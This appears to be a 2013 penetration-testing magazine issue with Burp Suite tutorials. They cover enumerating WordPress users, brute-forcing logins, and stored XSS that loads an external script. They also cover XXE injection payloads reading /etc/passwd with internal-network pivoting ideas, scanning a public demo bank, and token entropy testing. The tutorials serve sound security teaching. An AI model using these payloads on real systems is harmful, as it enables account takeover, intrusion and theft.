As I mentioned earlier, since this is a test site we can submit forms and comments to our hearts desire, so let’s browse to a page that allows us to submit a comment to the application. For now we’ll just submit a plaintext comment with no attack strings included. Figure 5. Captured request in proxy interceptor
Figure 6. Scanner results OPEN 01/2013
Figure 7. WordPress comments posted by Burps scanner Page 34
http://pentestmag.com
Once Burp begins to scan the comment submission (the progress of which we can check under the Scanner->Scan queue tab) we can open up the application page we submitted the comment to see the results of Burps scanner as shown in Figure 7. On this occasion it hasn’t turned up anything useful as WordPress will sanitize the user input from a non-admin or unauthenticated user. Perhaps as we go through the application we can gain additional rights as a different user that may result in less stringent validation which is a not uncommon occurrence in web applications. It is also important to note at this stage, that if this was a live site we have just filled up the comment board (and therefore the related database tables) with a large number of nonsensical comments.
Our first attack – user enumeration
As we continue browsing the application it is important to keep an eye out for any interesting parameters or patterns. As we browse around WordPress keep a note of any of these interesting items that we should come back to later. One such pattern that is noticeable in a default WordPress in-
Figure 8. Target request in proxy interceptor
Figure 9. Intruder with default payload positions OPEN 01/2013
stallation is that each post contains an author’s name as a signature, for example: “This entry was posted in Pentesting by killian”. If we click on an author’s name we will be brought to a page listing all the authors’ contributions to the application which has a URL similar to http://example.com/ wordpress/?author=2. In this case a pattern has led us to the author parameter which appears to be something we should explore a little deeper (Verónica Valeros 2011). A quick manual inspection, substituting the value 2 for 1, gives us a different author’s home page for each submitted integer, complete with what looks like the authors username. To this end, we turn our intercepting proxy on again and refresh the page, this time catching the page in our intercepting proxy where it should look something like the post in Figure 8. When the post gets caught in the intercepting proxy, rightclick in the intercept pane and select the context menu option “Send to Intruder”. Now we can really start using some of the more useful features of Burp. Open the Intruder tab to display the 4 tabs beneath. To begin with we’re going to use the “Positions” tab as shown in Figure 9 to define the type of attack we want to perform and to isolate the specific parameter we want to test. The first thing we need to do is to choose the type of attack we want to perform. There are 4 attack types available to us: sniper, battering ram, pitchfork and cluster bomb. For this particular test we are only going to use the sniper attack type, but later on we will also be using the cluster bomb attack type. The sniper attack type uses a single set of payloads and targets each payload position in turn. Payload positions are the insertion points in request that we select, and payloads can be anything from sequential integers to custom compiled attack strings that can be loaded from external files. Burp will automatically highlight each potential payload position that could be used during the attack as can be seen in Figure 9. As we are only interested in the “author” parameter right now click the “Clear” button on the right hand side of the Intruder->Positions pane. Once the pane has cleared the default selected parameters highlight the author parameter value “2” and click the Add button. This will select the author parameters value to be used as an insertion point for the next step. Now we move to the Intruder->Payloads tab and select the Payload set as 1 and the Payload type as “Numbers”. This will allow us to test a user-defined sequential set of numbers against the author parameter. In this case we’ll only use sequential in-
Page 35
http://pentestmag.com
BURP SUITE teger values between 0 and 20 as shown in Figure 10 as there are very few users of the application. There is one further option that we will be using that can help make life a bit easier when testing a site. Under the Intruder->Options tab we can specify a grep command to extract specific terms from the responses we get back from the server. Scroll down the options tab until you see the “Grep – Extract” section as show in Figure 11. In order to fill out this grep expression we will need to take a look at the source of the returned page after we’ve performed a manual test of the author parameter. What we’re looking for is something to identify the author’s username, preferably something that uniquely identifies that user but is present on all authors’ pages. Upon close inspection of our WordPress application it seems that the text in below is a good choice. This text is part of the link to the author’s page that appears on the bottom of every post by the author.
We will now click the “Add” button beside the “Grep – Extract” section which allows us to add a starting and ending point for our extraction as shown in Figure 12. Everything inside these mark-
ers will be captured by the intruder and inserted into one of its output columns as the test runs. It’s also worth clicking the “Refetch Reponse” button prior to accepting to make sure that you’re retrieving the correct term. The highlighted text in the received response is what you can expect to get back from the intruder after the attack. Now that we’ve configured the intruder we can begin our attack. To do so we click on the Intruder menu item at the top of the Burp window and choose “Start attack”. At this point the window in Figure 13 will pop up which will show each request including columns for the payload (our integer values), the HTTP status of the request, the length of the response which is useful when determining if a returned request contains something of merit, the search string we specified in the “Grep – Extract” section and a comment column. In this instance we’re only concerned with the search string column. In the next step we will be using the usernames in this column as part of an attempt to brute force the applications user accounts. In this instance we can see in Figure 13 that we have found the usernames killian, dave, admin, john, frank, tony and paddy.
Account brute forcing
Before beginning this step I want to point out that brute force testing can lock out user accounts causing an effective denial of service so make sure that you have the required authorization and that the applications owner is aware of the risks before beginning!
Figure 10. Intruder sniper payload options
Figure 11. Grep extraction settings OPEN 01/2013
Figure 12. Defining and testing the pattern to capture Page 36
http://pentestmag.com
In order to make use of usernames we found in the last step will need to create a text file containing the names. In the attack window click on the “Save” menu item choose to save the “Results table”. Before saving untick all the included columns except for our search column which in this case is the ‘rel=”author”>’ column. Also make sure to untick the “Save header row” checkbox before saving. Once you have saved this to a file open it and remove out any blank lines or duplicates so that we don’t waste time testing for a blank user or for the same user multiple times. Keep this file somewhere safe as we will be coming back to it shortly. The next step is for us to open up our browser again and to try and login to the site. As this is a default WordPress installation the login page will
Figure 13. Intruder results window displaying author names
Figure 14. Intruder payloads using author names OPEN 01/2013
be http://example.com/wordpress/wp-login.php. After connecting to the login page we’ll enter a random username and password. The purpose of this is to obtain a permission denied error from the application so that we can use this as a baseline for our brute force attack. Once again we’ll need to intercept this request in our intercepting proxy before sending it to the intruder. Once we’ve sent this request onto the intruder we can begin setting up our attack. We’ll choose the cluster bomb attack in this instance as we want to try each of our discovered usernames against a multitude of different passwords. Make sure to only select the username and password parameters in the Intruder window which contain the random values we entered previously. Highlight these two values and add them as payload positions. Now we can move onto choosing our payloads. As we are now using the Cluster Bomb attack and have two parameters which we are attacking we can assign each position its own payload set. First we will begin with the username payload set which is where our earlier saved file comes into play. Set the payload set to 1 with a type of “Simple list” as can be seen in Figure 14. In the “Payload Options” section click the “Load …” button and browse to the username file we saved earlier. The resulting list should look something that in Figure 14. Now to setup our second payload. In order to do this we need to set the “Payload set” to 2. Our “Payload Options” will disappear now as we are working with the second parameters payloads. The target of this second payload set is our user’s passwords, so a good password list for this is a must. I would recommend however not putting in anything too large as it will take a significant amount of time to test all the combinations. I tend to prefer a “breadth-first” attack when brute forcing as opposed to a depth-first one – i.e. using relatively short list of the most commonly used passwords with (if possible) a large list of known user accounts. If the breadth-first attempt doesn’t work I fall back to a more general blanket search of as many usernames and passwords as I have available to me, but unfortunately in a cluster bomb attack the number of requests made is the product of the “number of payloads in all defined payloads”. In this case we have 7 users, so if we tried 100 passwords that would equate to 700 requests. If we had a quite feasible 1000 users with an equally feasible list of 100,000 potential passwords we would then be looking at a cool 100,000,000 requests. As you can see that while
Page 37
http://pentestmag.com
BURP SUITE the amount of requests isn’t too bad for a small number of payloads it increases pretty quickly. For this example I’ll be using a drastically cut down password list to which I’ve added some of the passwords in use in the application to show how this kind of attack can succeed. Seeing as we now have both payload positions setup it’s time to start the attack. This attack will take a bit longer than the previous one did, so unless you’ve picked the passwords on the application you’re testing it’s usually a good time to go grab a coffee. Once the attack has finished it’s time to take a look at the results, shown here in Figure 15. The easiest way to browse the results is to sort the columns. I usually sort first by Status and have a look at what’s returned there, and if that yields no success then sorting by Response Length is your next stop. In this particular application either option will do fine as you’ll pick out the correct results easily based on either method. We can see in the above that there’s something interesting about the last 3 attempts in the list for the users admin, killian and tony. We’ll focus on the admin user for the moment, because that’s the most likely option for mischief. If we select the request in question and look at the bottom pane of the attack window we can view the response the
server sent back. It’s sent us a HTTP 302 Redirect, as opposed to most of the other attempts that sent us a HTTP 200 OK message. Upon inspection it becomes obvious that with Burps help we’ve guessed the admin users password. As shown in Figure 16, we can tell this by the “Location:” line in the response which is redirecting us to the admin section of the application.
Logging in
The obvious next step is to take the successful payload and login to the site to continue our testing. As we’re going to be logging in as the admin user I would advise turning off Live Scanning before proceeding in case the scanner takes liberties and delete’s all the applications users. After logging in as the admin user there are some tests that we performed earlier that could perhaps be run again with different results. Let’s connect to one of the posts we commented on earlier and attempt to submit a comment with our new credentials. We’ll just use a plain piece of text for the moment which we will then feed into Burps active scanner to test for us. This time we won’t intercept the comment, but rather will pick it out from the “Site map” which can be found under the Target tab. As you can see in Figure 17 we can expand the wp-comments-post. php page under the Site map in order to see individual posts. Select the last post which was performed as admin (highlighted in our case below) and rightclick on it. From here we can use the context menu to perform an active scan on the page using the admin credentials and have Burp automatically post potentially dangerous content to the application.
Figure 15. Intruder results with username and password results
Figure 16. Viewing a response from the intruder’s results OPEN 01/2013
Figure 17. Target site map Page 38
http://pentestmag.com
Now we will move over to the Scanner->Results tab to see how our scan is going now that we have admin privileges. As can be seen in Figure 18 it looks as though Burp has detected a cross site scripting issue which warrants closer inspection. On opening the page our comment was posted to we’re greeted with a familiar JavaScript alert box reminding us of the importance of the number 1 (Figure 19). We can use this opening to leverage a little more out of the application using Burp’s repeater function, but first we’re going to compare it to a second admin post to make sure that we can account for any per/post variables required such as post ids etc. Obviously we already know this won’t yield any interesting information but it’s a good opportunity to see the comparer in operation We’ll now open the Scanner->Results tab and highlight the offending issue. Burp should display several tabs in the bottom pane including a request and response tab which show what was sent and received to identify this vulnerability. We can select either the request or response and will need to right-click in the middle of the pane and select “Send to Comparer” from the context menu.
Figure 18. Scanner results showing cross-site scripting
Figure 19. Cross-site scripting showing a JavaScript alert(1) OPEN 01/2013
Now we just need to move back to the browser and create a new clean comment to compare our vulnerable request with. To do so submit a comment, catch it in the interceptor and send it to the comparer. Once both comments have been sent to the comparer we can open the Comparer tab. There are a few different ways to compare requests but we’ll just focus on one way in this article. Once in the comparer window we select the option to compare words located the bottom right hand side of the window. At this point we’ll receive a popup window like that in Figure 20 that highlights the differences between the two requests. Clicking on the “Sync views “ button will keep the two panes synchronized as we scroll down the requests making it easier to compare them. In Figure 20 there’s no significant difference as far as our current test is concerned so we can proceed as planned.
Repeating requests
Now that we’re 110% sure that we don’t need to worry about missing post ids we can move on to the repeater. The repeater allows us to focus on a single page and tweak our attacks slowly but purposely to send crafted strings to the application. To start off with we can need to send one of our old friends, the comment post, to the repeater. What we’re hoping to achieve with the repeater is to build on the success of the active scan that successfully
Figure 20. Comparing requests
Figure 21. Cross-site scripting in a captured comment post Page 39
http://pentestmag.com
BURP SUITE inserted a JavaScript alert box by leveraging this issue to include a JavaScript script hosted elsewhere which will be loaded each time a user visits the page. This kind of script inclusion can be used for phishing attacks, cookie and credential stealing, site defacement, cross-site request forgeries and cross-site scripting (XSS) proxying amongst other attacks. After we have sent the previously successful request to the repeater we will need to open it up under the Repeater tab in order to alter it. The purpose of this is to substitute the original attack string for a new, more purposeful one. For the WordPress application I’m going to start off trying to include a custom JavaScript script using variations of the string: <script src=http://example. org/crosssite.js>. Once we’ve substituted the string click on the Go button to send the request to the application. In this case (and in many other cases) the application will take our request and issue a redirect. We can follow this by selecting the “Follow redirection” button to the right of the Go button. Depending on the string used the attack may or may not work…but that’s the great thing about the repeater! We can try again and everything’s already setup for us! Before resetting our repeater have a look through the source of the response to see what’s gone wrong with the request. How is the inserted string represented in the returned page? What changes can we make to ensure it works next time? Try opening the response in your browser to get a feel for what’s going on from a user’s perspective by right-clicking on the response and selecting “Show response in browser”. After investigating what our next step is it’s time to get back to work. In order to go back a few steps to the original request we need to hit the back button a few times on the repeater ( ). It’s often necessary to keep trying slightly different
combinations until you find one that sticks. Eventually you’ll find yourself able to submit an attack string that takes and loads in your external JavaScript file. I like to keep my includes simple and to the point, just enough to show that it’s feasible to inject JavaScript on the site and include external information. Once we’ve successfully completed our attack we should be able to browse to the application page we submitted our comment to and view the results of our JavaScript include as shown in Figure 22. As you can see the URL we’re connecting to is still http://example.com/ wordpress/?p=8 but we now control the content of the page!
Conclusion
In this article we covered some of the more useful and widely used Burp components and shown how they can be leveraged to include and help improve on automated scanning techniques. We went through attacking a default WordPress installation and how to get from having no prior knowledge to obtaining administrative credentials. The Burp Suite is an immensely useful intercepting proxy and has many more features, including the ability to include custom add-ons that I haven’t even touched on in this article. Hopefully reading this article has given you some insight into the Burp Suite and its capabilities and will spur you on to give it a try yourself. If you do want to try it out for yourself the free edition includes the proxy, spider, repeater and comparer which is enough to get you started with manual testing. If you want the more automated features you will need to spring for the Professional edition – but it’s well worth it. Works Cited
Verónica Valeros. Talsoft S.R.L., WordPress User ID and User Name Disclosure. 05 26, 2011. http://www.talsoft.com.ar/ index.php/research/security-advisories/wordpress-user-idand-user-name-disclosure (accessed 10 31, 2012).
Killian Faughnan
Figure 22. Using cross-site scripting to control page content OPEN 01/2013
Killian Faughnan works in Dublin, Ireland as an Information Security Consultant for Ward Solutions performing penetration tests on all sorts of infrastructure and applications (the vast majority of which have nothing to do with WordPress!). He can be reached at: www: www. killianfaughnan.com, LinkedIn: www.linkedin.com/in/ kfaughnan
Page 40
http://pentestmag.com
RESEARCH INSTITUTE OF FORENSIC AND E-CRIME
Protection through Research RIFEC OFFER A FREE RISK ANALYSIS SERVICE CONTACT US FOR FURTHER INFORMATION
The growth of the internet and the massive use of new technologies has been the biggest social change of this lifetime. Increasing dependence on these technologies has brought new risks. RIFEC takes these risks seriously. In our laboratories we conduct researches to tackle these threats and develop our response. Our objective is to set strategies to reduce vulnerabilities and secure the benefits of a trusted digital environment for businesses and individuals.
Web: Twitter: Linkedin: Email:
www.rifec.com www.twitter.com/rifec www.linkedin.com/company/rifec info@rifec.com
BURP SUITE
Infiltrating Corporate Networks Using XML External Entity Injection
This tutorial is going to explain how to exploit an External Entity Injection (XXE) vulnerability using Burp suite and make the most out of it. Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.
I
n order to understand the material of this article you have to have basic working knowledge of the Burp Suite, more specifically you would have to know how to use Burp Intruder works, would also have to have basic understanding of XML is working.
XML document). A successful XXE Injection attack could allow an attacker to access operating file system, cause a Denial of Service (DoS) attack or inject a JavaScript (e.g. perform a Cross Site Scripting attack).
What is an External Entity Injection (XXE)
When the XML processor recognizes an external reference to a parsed entity (parsed entity in our situation is the processed request made from our internet Browser, by the XML parser), in order to validate the document (the document in our situation represents the server response), the processor MUST include its replacement text. If the entity is external, and the processor is not attempting to validate the XML document, the processor MAY, but need not, include the entity’s replacement text. If a non-validating XML processor does not include the replacement text, it MUST inform the application that it recognized, but did not read, the entity, although that might not be happening. When an entity reference appears in an attribute value, or a parameter entity reference appears in a literal entity value, its replacement text MUST be processed in place of the reference itself as though it were part of the document at the location the reference was recognized, except that a single
An XXE Injection is generally speaking a type of XML injection that allows an attacker to force a badly configured XML parser to “include” or “load” unwanted functionality that compromise the security of a web application. Nowadays is rear to find this type of security issue. This type of attack is well documented and known since 2002. XML external entity injection vulnerability arises because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage. An XXE attack is usually an attack on an application that parses XML input from untrusted sources using an incorrectly configured XML parser. The application may be coerced to open arbitrary files and/or TCP connections (e.g. allow embedding data outside the main file into an OPEN 01/2013
How the XML parser works
Page 42
http://pentestmag.com
or double quote character in the replacement text MUST always be treated as a normal data character and MUST NOT terminate the literal.
<!ENTITY xxe SYSTEM “/etc/passwd”> ]> <PutMeHere>& xxe ;</PutMeHere>
How the XML parser handles a XXE
The ENTITY definition creates the XXE entity, and references an external entity in the final line. The textual content of the PutMeHere tag will be the content of /etc/passwd. If the above XML input is fed to a badly configured XML parser then the passwd is going to be loaded. The XML document is not valid if the &xxe is not started with the ‘&’ character and terminated with ‘;’ character. Note: The attack is limited to files containing text that the XML parser will allow at the place where the External Entity is referenced. Files containing non-printable characters, and files with randomly located less than signs or ampersands, will not be included. This restriction greatly limits the number of possible target files.
An XXE is meant to convert to a Uniform Resource Identifier (URI) reference (as defined in IETF RFC 3986), as part of the process of dereferencing it to obtain input for the XML processor to construct the entity’s replacement text. It is an error for a fragment identifier (beginning with a # character) to be part of a system identifier. Unless otherwise provided by information outside the scope of this article, or a processing instruction defined by a particular application specification), relative URI’s are relative to the location of the resource within which the entity declaration occurs. This is defined to be the external entity containing the ‘<’ which starts the declaration, at the point when it is parsed as a declaration. A URI might thus be relative to the document entity, to the entity containing the external Document Type Definition (DTD) subset, or to some other external parameter entity. Attempts to retrieve the resource identified by a URI may be redirected at the parser level (for example, in an entity resolver) or below (at the protocol level, for example, via an HTTP Location: header). Note: A Document Type Definition defines the legal building blocks of an XML document. It defines the document structure with a list of legal elements and attributes. A DTD can be declared inside an XML document, or as an external reference. In the absence of additional information, further analysis on XML parser functionality is outside the scope of this article.
An example of XXE
XML parsers are used in many different applications to either load locally XML documents from the hard disk of a workstation or to process remote requests through various protocols (such as http). In this example it is assumed that an application is using a badly configured XML parser to load a XML document. In the following example the XML document will make an XML parser read /etc/passwd (if the underplaying operating system is a Unix or Linux system) and expand it into the content of the PutMeHere tag: <?xml version=”1.0” encoding=”ISO-8859-1”?> <!DOCTYPE PutMeHere [ <!ELEMENT PutMeHere ANY> OPEN 01/2013
Identifying XXE Injections
The following table contains attack strings that can help someone break the XML schema and cause the XML parser to return verbose errors and help identify the XML structures (Table 1). Note: The CDATA section delimiters: <![CDATA[ / ]]> – CDATA sections are used to escape blocks of text containing characters which would otherwise be recognized as markup. In other words, the XML parser does not parse all characters enclosed in a CDATA section.
The XXE attack scenario
A XXE exploit can result as already mentioned earlier into operating system (OS) read hard Table 1. Attack strings to break the XML schema 1
'
2
''
3
"
4
""
5
<
6
>
7
]]>
8
]]>>
9
<!--/-->
10
/-->
11
-->
12
<!--
13
<!
14
<![CDATA[ / ]]>
Page 43
http://pentestmag.com
BURP SUITE disk access, a similar side effect to a path traversal attack. A more complex scenario would be for us to have a sophisticated application that performs for example e-banking transactions and uses the browser as an end point thin client that absorbs the web service after of course a successful login. So lets assume that the transaction XML message uses the user name and password back and forth along with XML message in order to perform the login and authorize the user. Note: All information needed for the transaction is encapsulated inside the XML message. Note: An http 200 response is returned along with the success message for the transaction.
Figure 1. Burp Proxy → Capture the request and send to Burp Intruder
Using Burp to exploit the XXE
The free version of Burp Suite can be used to identify and exploit this type of vulnerability. The first thing to do would be to create a file containing all attack strings contained in the table above. Lets assume that a file like that is already created and named payloads. The next thing to do would be to load the payload file to Burp Intruder and launch the attack (Figure 1 and Figure 2). Note: If the web application is vulnerable to XXE injection then you will start receiving XML verbose error messages that indicating the application is vulnerable to XXE (Figure 3-5). After you launch the attack and identify the that the web application is vulnerable to XXE Injection
Figure 3. Burp Intruder → Load the payload file
Figure 4. Burp Intruder → Switch to sniper mode
Figure 2. Burp Intruder → Mark the vulnerable web application part OPEN 01/2013
Figure 5. Burp Intruder → Launch the attack Page 44
http://pentestmag.com
References • • • • • • •
http://www.securityfocus.com/archive/1/297714 http://www.w3.org/TR/REC-xml/#include-if-valid http://www.securiteam.com/securitynews/6D0100A5PU.html http://shh.thathost.com/secadv/adobexxe/ http://portswigger.net/burp/ http://code.google.com/p/teenage-mutant-ninja-turtles/ http://securityhorror.blogspot.ie/2012/03/what-is-xxe-attacks.html
you insert the following string in the entry point designated in the screen shot above: <!DOCTYPE
foo [<!ENTITY xxefca0a SYSTEM “file:///etc/ passwd”> ]>. If the attack is successful the serv-
er response would the one shown in the next page.
More on what can you do with a successful XXE attack
The advanced attacker can use the vulnerable web application as a web proxy, retrieving sensitive content from any web server that the application can reach, including those running within the organization DMZ using non rout-able address space. Expanding more on the subject we can assume that: • The attacker can exploit vulnerabilities on back-end databases (e.g. perform web directory brute forcing, exploit SQL Injections or retrieve files through path traversal injections). • The attacker can also port scan surrounding machines by cycling through large numbers of IP addresses and port numbers. In some cases, timing differences can be used to infer the state of a requested port. In other cases, the service banners from some services may actually be returned within the web application responses. • The attacker might be able to use the vulnerable web sever to map firewall rules on other company extranets. • The attacker might be able also to DoS attack internal company web server machines. • The attacker might be able hide his/her traces by mixing port scans with the vulnerable web server fake traffic generated from the XXE traffic.
Mitigation of XXE vulnerabilities
The XML parser should not follow URI(s) to External Entities, or only follow known good URI(s). With some parsers in order someone to disable XXE must set the setExpandEntityReferences to OPEN 01/2013
false, but note that this doesn’t do what you expect for some of the XML parsers out there. A XML external entity injection can use of the DOCTYPE tag to define the injected entity. XML parsers can usually be configured to disable support for this tag. You should consult the documentation of your XML parsing library to determine how to disable this feature. It may also be possible to use input validation to block input containing a DOCTYPE tag.
Gerasimos Kassaras
Gerasimos is a security consultant holding an MSc in Information Security, a CISSP and specializing in penetration testing. Working alongside diverse and highly skilled teams Gerasimos has been involved in countless comprehensive security tests for global applications platforms, counting more than 200 web application penetration tests so far, the majority of his experience is in the financial and telecommunications, sectors in Greece, United Kingdom, Italy, Turkey, Ireland and Dubai.
Page 45
http://pentestmag.com
BURP SUITE
Web Application Penetration Testing Using Burp Suite
Burp Suite is an integrated platform with a number of tools and interfaces to enumerate, analyze, scan, and exploit web applications. Its main tool, Burp Proxy, is used to intercept HTTP request/responses, but it has recently been extended to provide a suite of other useful tools for web app penetration testing. In this article, I will introduce some of the features of Burp Suite and share my experiences using these tools.
T
here are so many tools out there available for web application penetration testing and every pen-tester has their own toolkit to carry out the testing process, ranging from the initial analysis of applications and vulnerabilities to constructing attacks by exploiting these vulnerabilities. One common tool favored by pen-testers is Burp Suite.
Burp Features
Burp Suite contains many tools including: • Proxy: Burp Proxy is a tool used to inspect and modify traffic between your browser and the target application. • Spider: Burp Spider is a tool for mapping web applications. It uses various crawling techniques to generate an inventory of the application’s content and functionality. • Scanner: Burp Scanner is a tool for discovering security vulnerabilities in web applications. It provides the option to conduct passive and active scanning. • Intruder: Burp Intruder is a tool for automating customized attacks against web applications. • Repeater: Burp Repeater is a tool for manually modifying and reissuing individual HTTP requests, and analyzing their responses. OPEN 01/2013
• Sequencer: Burp Sequencer is a tool for analyzing the degree of randomness in application tokens. • Decoder: Burp Decoder is a simple tool for transforming encoded data into its canonical form, or for transforming raw data into various encoded and hashed forms. • Comparer: Burp Comparer is a simple tool for performing a comparison, i.e. a visual difference, between any two items of data. Source: http://portswigger.net/burp/.
Web Application Penetration Testing
In web application penetration testing there are two main work-plans: automated and manual testing. Automated testing relies on the use of scanning tools such as Burp Scanner, IBM Appscan Standard, and other tools to identify security vulnerabilities in web applications. On the other hand, manual testing extends the scope of testing through the use of manual hacking techniques. These techniques include tests for privilege escalation, authentication and authorization, as well as SQL injection. In this section, I begin by describing how to use Burp Proxy and move on to describe how to use Burp Scanner to perform automated scanning.
Page 46
http://pentestmag.com
I will follow with a discussion to manual testing techniques using different features of Burp Suite.
Configuring Burp Proxy
Just like other proxy tools, Burp acts as a local proxy which allows users to intercept HTTP requests and responses. To begin, letâ&#x20AC;&#x2122;s configure the web browser on local proxy settings to use Burp Suite. First, set up the browser proxy to a listening port. Then using Firefox, go to Preferences and click on the Advanced tab->Networking. Configure the browser proxy to listen on localhost port 8080. Burp Proxy will use port 8080 by default but this can be changed to any port you wish. Figure 1 below shows how I configured Firefox to use the Burp Proxy to intercept all HTTP traffic.
When you open Burp Suite proxy tool you can verify the proxy is running by clicking on the Options tab. Notice that Burp proxy is using 8080 as the default port (Figure 2). Since the proxy is now running and ready to use Burp Proxy, we will begin logging the requests and responses that pass through it. As an illustration, I will browse through an example website (www. google.com) to intercept requests and responses by enabling the feature under the Intercept tab. However, we need to ensure that Burp Proxy is configured to intercept these requests by setting the checkmark under the Options tab (Likewise for server responses; Figure 3).
Using the Scanner Tool
The scanner tool is available in the Burp Pro version at Portswigger (currently on v1.5). Go to Scanner --> Live Scanning tab, you will see the following radio features (Figure 4). The Live Passive Scan feature allows Burp to passively check traffic going through the proxy for security vulnerabilities. In contrast, the Live Active Scan feature initiates HTTP request/responses using some pre-determined list of test cases. Burp
Figure 3. Intercepting HTTP Requests using Burp Proxy
Figure 1. Configuring Firefox Proxy Settings
Figure 2. Configuring Burp to Listen on Port 8080 OPEN 01/2013
Figure 4. Live Scanning Tab Features Page 47
http://pentestmag.com
BURP SUITE Scanner uses heuristics to select a subset of test cases to check for common vulnerabilities. Choosing the “Use suite scope” radio option restricts the scope of scanning to the domains defined in your Target tab. Going to the Scanner->Options tab, scroll down to the end of the tab panel. As depicted below, we can see the different passive scanning areas enlisted as checkmarks. These checkmarks control
Figure 5. Passive Scanning Options
Figure 6. Active Scanning Options OPEN 01/2013
the types of tests performed during passive scanning. Passive scanning looks at different header fields, form parameters, cookies and other fields when requests and responses are intercepted through Burp Proxy. Examples of flaws identified using passive scanning include information disclosure, insecure use of SSL, and cross-domain exposure. The advantage of passive scanning is that it lets you safely find security vulnerabilities without sending any additional requests to the application (Figure 5 and Figure 6). Scrolling up you will see the Active Scanning Options. These options include settings of the type of tests performed during active scanning. Burp scanner will actively send malicious HTTP requests for all in-scope URLs to test for SQL injection, crosssite scripting, and other types of injections. In order to perform a thorough scan, you need to walk Burp Scanner through the interesting parts of the application’s functionality. Let’s test the effectiveness of Burp Scanner on a demo site (http://demo.testfire.net). This website is an example of a demo bank web application developed by IBM to illustrate the use of their commercial IBM Appscan Standard tool. We illustrate using Burp Scanner on this website but we can also utilize other vulnerable demo web applications. After you have configured the browser proxy to an actively listening port on Burp, log in to the ap-
Figure 7. Adding Target to Scope Page 48
http://pentestmag.com
plication using the following credentials (as provided by the demo authors): Username: jsmith Password: Demo1234
By browsing through the application, you will see the domain of the site under the Target tab. To use this tool, it is best to define the scope of the scan using the Target tab first. As shown in Figure 7, include the domain (demo.testfire.net) by right clicking on the URL under the Target tab and selecting “Add to Scope”. You will notice that a regex string ^demo\.testfire\.net is added under the Scope sub-tab. You can also choose to exclude some path URLs. Click on the gray horizontal bar called “Filter” just under the tabs and select “Show only in-scope items” (Figure 7-12).
After configuring Burp’s scanning options, you will notice that the scanner has kicked off once browsing has started. You can see the progress of the active scan using the Scanner->Scan Queue tab which lists the host, the path of the web content that is being tested, and the test progress status. The tab shows the queue of test cases with different colors to signify the severity level of the findings: red for high, orange for medium, yellow for low, and gray for informational. In the Scanner->Results tab, the list of URLs is shown in the left panel with the corresponding findings on the right. On each finding selected, an advisory is presented to describe potential vulnerabilities and the raw HTTP request/ response is included. The scanner tool allows us to change the severity and confidence levels of each finding. The severity level dictates the rating of the finding based on its security impact and likelihood of being exploited. The confidence level is a measure of how certain the scanner is that the finding is a true vulnerability. These ratings can be manually modified on a particular issue simply by right-clicking and selecting the desired level. In addition to changing the ratings on a finding, you can also delete or mark as false positives.
Figure 8. Setting Show Only In-Scope Items
Figure 11. Burp Active Scan Progress
Figure 9. Demo Testfire Login
Figure 10. Demo Testfire Main Page OPEN 01/2013
Figure 12. Burp Scan Results Page 49
http://pentestmag.com
BURP SUITE Evaluation Tools
In the previous section, we used Burp Scanner for automated vulnerability scanning of web applications. This is a very efficient way to kick off a web application penetration test, as it enables you to discover the application’s weaknesses before moving on to manual exploitation. The premise is that by identifying vulnerabilities in an application quickly, we will be able to fix these issues before hackers take advantage of them. However, automated scanning does not cover everything and manual testing is needed to discover issues such as Cross-Site Request Forgery (CSRF), business logic flaws and stored XSS. Below, I describe additional tools in Burp Suite that can help you identify these types of issues.
Sequencer to Assess Randomness of Session Data
One important part of web application penetration testing is the evaluation of the randomness of the session data/tokens used by an application. The Sequencer tool is a good tool to use for this type of testing because it tests the entropy of tokens by capturing multiple sequences of data/tokens for statistical analysis. In order to use the Sequencer tool, we need to send out a request which sets the token we are trying to assess. For example, if we are evaluating the randomness of the ASP.NET_SessionId cookie for the demo Testfire application, we search for the request/response in which this session cookie is set. Looking at the History tab, we see that the session cookie is set in the response to the initial GET request for the login page which is /bank/login.aspx. To capture the request, we right click on the item in the History tab and send it to the Sequencer tool (Figure 13). Consequently, the Sequencer tool has automatically retrieved the tokens in the response. We can check this out under Sequencer->Live Capture sub-tab. Under the “Token Location Within Response” section, we will see the populated token values in the drop-down box where you can mark it as the value to test. In our case, the token we are looking for is the session cookie, so we select the radio item “Cookie” and choose the ASP.NET_ SessionId item in the dropdown box. Clicking on the “Start capture” button will launch the Sequencer live capture window. As depicted, Sequencer will send out multiple requests automatically and record the cookie value received OPEN 01/2013
in the responses. In order to perform the entropy analysis, Sequencer will need to capture at least 100 token values. A sample size of 1000 tokens is sufficient enough to have a statistically significant outcome. Once you have captured enough tokens, click on “Analyze now” button which will analyze the captured values immediately. As described by PortSwigger, Sequencer has two types of analysis: character-level analysis and bit-level analysis. They are all enabled by default, but you can turn them on or off in the Options tab. There are two types of character-level analysis supported by Sequencer: • Character count analysis: This type of analysis tests the frequency distribution of characters used at each position within a token • Character transition analysis: This type of analysis measures the likelihood of some character appearing after another character, thus evaluating the transition probability between successive tokens in a sample.
Figure 13. Sending Session Cookie to Sequencer
Figure 14. Configuring Sequencer
Page 50
http://pentestmag.com
Sequencer also supports seven types of bit-level analysis adopted from the standardized FIPS tests. These are:
techniques and whether or not they are in place to defend against CSRF.
• FIPS monobit test: This test analyzes the distribution of ones and zeros at each bit position. • FIPS poker test: This test divides a bit sequence into consecutive groups then taking the count of occurrence of each group and performing a chi-square calculation to evaluate the distribution. • FIPS runs tests: This test divides the bit sequence at each position into runs of consecutive bits which have the same value. • FIPS long runs test: This test measures the longest run of bits with the same value at each bit position. • Spectral tests: This test performs analysis of the bit sequence at each position. • Correlation test: This test the amount of randomness at each bit position calculated in isolation. • Compression test: Evaluates the amount of entropy at each bit positions by compressing the bit sequence using standard ZLIB compression (Figure 15 and Figure 16).
Cross site request forgery (CSRF) vulnerabilities exist when an application fails to ensure that a valid user intentionally initiated a request to the server. When this weakness is present in an application, a malicious user can force a victim’s browser to submit a request by tricking the user into navigating to a malicious page controlled by the attacker. This page contains code which automatically submits a malicious request to the target application. If the legitimate user is currently authenticated to the application, the malicious request will successfully execute thereby allowing the attacker to perform any actions the application provides to a valid user. Below, I show a flow chart of the testing methodology that I use to verify if proper mitigation techniques are in place.
Testing Methodology
Figure 15. Running Live Capture in Burp Sequencer
